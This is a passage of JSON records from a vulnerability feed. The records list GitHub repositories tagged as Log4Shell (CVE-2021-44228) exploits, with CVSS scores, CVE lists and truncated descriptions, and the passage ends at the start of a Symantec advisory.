"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228", "CVE-2021-4104", "CVE-2021-45105"], "modified": "2021-12-21T11:08:13", "id": "D298A3C8-E215-5549-B1A0-D01215070203", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T13:56:34", "description": "<div align=\"center\" >\ud83e\udd1d Show your support - give a \u2b50\ufe0f if you like...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T22:35:00", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", 
"CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-04T10:19:19", "id": "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T02:11:24", "description": "# S\u00e5rbarheter i Log4j\n\nOppdatering 19.12.2021: Det oppdages stad...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:48:49", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-45105", "CVE-2021-4104", "CVE-2021-44228", "CVE-2019-17571"], "modified": "2021-12-19T23:28:13", "id": "3DFE8091-03AE-565B-A198-BD509784502C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:45:43", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
"CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "342CC1B7-6E24-5767-A7B1-90B95A91B503", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:38:51", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "C76F7089-967B-5A7F-B8DA-629452876A2A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:34:22", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", 
"CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "DECBAC7B-9235-5E00-81C1-142CD41306FB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:45:38", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T20:14:39", "description": "# Detecting CVE-2021-44228 and CVE-2021-450...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T21:57:58", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-17T14:19:20", "id": "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# Log4j CVE-2021-44228 and CVE-2021-45046\n\n## Requisites\n\nUse a ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T13:08:03", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-02-07T01:16:44", "id": "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T08:44:38", "description": "# Log4Shell-Rex\n\nThe following RegEx was written in an attempt t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T21:39:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-04T08:12:01", "id": "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "href": "", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-31T15:07:30", "description": "# log4shell.tools [\uc774 2.15\uc5d0\uc11c \ud328\uce58\ub418\uc5c8\uc9c0\ub9cc, CVE-2021-45046 (DoS \uc720...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T11:43:56", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-18T11:53:15", "id": "0D243A34-B42E-5007-90D0-A30ECABDA204", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-15T21:01:40", "description": "# horrors-log4shell\n\n> A micro lab (playground?) 
for CVE-2021-44...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T15:44:49", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-03-15T19:14:39", "id": "21AACF78-8053-529E-909E-B6D5158008AC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T20:12:20", "description": "# CVE-2021-44228_scanner\nApplications that are vulnerable to the...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T08:32:20", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in 
Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-17T08:32:31", "id": "00423BD1-64DA-5DB0-848E-1BACC0883E15", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-08T20:33:03", "description": "# Log4j-HammerTime\nThis Burp Suite Active Scanner extension vali...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T13:25:03", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-45046", "CVE-2021-44228"], "modified": "2022-01-08T17:32:58", "id": "D72095BC-06C5-50B2-8F66-EC86811783D3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-19T17:07:52", "description": "<h1 align=\"center\">log4j-scan</h1>\n<h4 align=\"center\">A fully au...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T14:20:54", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2021-12-19T14:23:40", "id": "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-24T23:28:04", "description": "<h1 align=\"center\">log4j-scan</h1>\n<h4 align=\"center\">A fully au...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-24T13:49:14", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-02-24T13:51:07", "id": "C3C6029E-8A78-5C0B-9CF6-51489E455464", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T02:07:32", "description": "# l4shunter\nTo hunt for machines vulnerable to CVE-2021-44228 or...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T21:39:28", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2021-12-19T23:01:02", "id": "645452DF-222B-51AD-963D-DB002A1FC803", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-09T09:03:12", "description": "## \u6982\u8ff0\n\nlog4j2 RCE\u6f0f\u6d1e\uff08CVE-2021-44228)\u5185\u7f51\u626b\u63cf\u5668\uff0c\u53ef\u7528\u4e8e\u5728\u4e0d\u51fa\u7f51\u7684\u6761\u4ef6\u4e0b\u8fdb\u884c\u6f0f\u6d1e\u626b\u63cf\uff0c\u5e2e\u52a9\u4f01\u4e1a\u5185...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T13:41:35", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": 
"2022-03-09T07:57:58", "id": "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-03T20:08:07", "description": "# CVE-2021-44228-log4j discovery [(Download the MKP package)](ht...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T10:46:53", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-42550", "CVE-2021-4104", "CVE-2021-44832", "CVE-2021-45105", "CVE-2021-45046"], "modified": "2022-01-03T18:51:19", "id": "836D22A0-0180-5937-A713-205130D72BDC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "symantec": [{"lastseen": "2022-01-21T17:31:38", "description": "**Summary**\n\nSymantec products may be susceptible to a flaw in the Apache Log4j 2 library JNDI lookup mechanism. A remote attacker, who can trigger Log4j to log crafted malicious strings, can execute arbitrary code on the target 